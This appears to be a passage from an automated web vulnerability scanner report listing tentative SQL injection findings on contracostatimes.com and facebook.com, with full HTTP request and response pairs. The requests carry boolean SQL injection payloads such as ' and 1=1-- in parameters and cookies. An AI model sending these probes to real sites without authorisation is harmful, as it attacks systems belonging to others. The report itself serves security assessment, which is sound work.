Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:52:03 GMT
Set-Cookie: JSESSIONID=5XBLXOMTXTN5GCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language
...[SNIP]...

Request 2

GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=GTJMUZKYMUT0ACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.pas
...[SNIP]...

1.143. http://www.contracostatimes.com/news/ci_16791147 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16791147

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 23783182%20or%201%3d1--%20 and 23783182%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/ci_16791147?123783182%20or%201%3d1--%20=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:52:07 GMT
Set-Cookie: JSESSIONID=0HUMVUTRKV3CGCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language
...[SNIP]...

Request 2

GET /news/ci_16791147?123783182%20or%201%3d2--%20=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:52:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=CB1MEKXOFWCDYCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 73333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.pas
...[SNIP]...

1.144. http://www.contracostatimes.com/news/ci_16792343 [nclick_check parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16792343

Issue detail

The nclick_check parameter appears to be vulnerable to SQL injection attacks. The payloads 33516214'%20or%201%3d1--%20 and 33516214'%20or%201%3d2--%20 were each submitted in the nclick_check parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d1--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:50:12 GMT
Set-Cookie: JSESSIONID=H3ZBRASCQDQBMCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get prof
...[SNIP]...

Request 2

GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d2--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=L4TSTKXBEQ2KICUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66698

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLo
...[SNIP]...

1.145. http://www.contracostatimes.com/samesexmarriage/ci_16792108 [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /samesexmarriage/ci_16792108

Issue detail

The source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d1--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:46:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:46:17 GMT
Set-Cookie: JSESSIONID=BHJYSCE0GIRNGCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 74247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the state&#27;s ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MN
...[SNIP]...

Request 2

GET /samesexmarriage/ci_16792108?source=most_viewed'%20and%201%3d2--%20 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:46:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=HCGRGUJOILIQMCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 74247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In more than two hours of legal sparring, lawyers on both sides of the battle over the state&#27;s ban on same-sex marriage were at various times pressed by each of the three 9th U.S. Circuit of Appeals judges hearing the challenge to Proposition 8.'><meta name="keywords" content="samesex marriage gay supreme court alameda contra costa county clerk"/><title>Appeals Court judges appear inclined to support gay marriage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MNGID";
</script><script language="JavaScript" type="text/javascrip
...[SNIP]...

1.146. http://www.facebook.com/logout.php [campaign_click_url cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /logout.php

Issue detail

The campaign_click_url cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the campaign_click_url cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /logout.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d1--%20;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=e0q9u; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 08 Dec 2010 01:55:25 GMT
Content-Length: 14018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zn/r/AzojFY93_oG.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zb/r/UCbfq1H_xvH.css" />
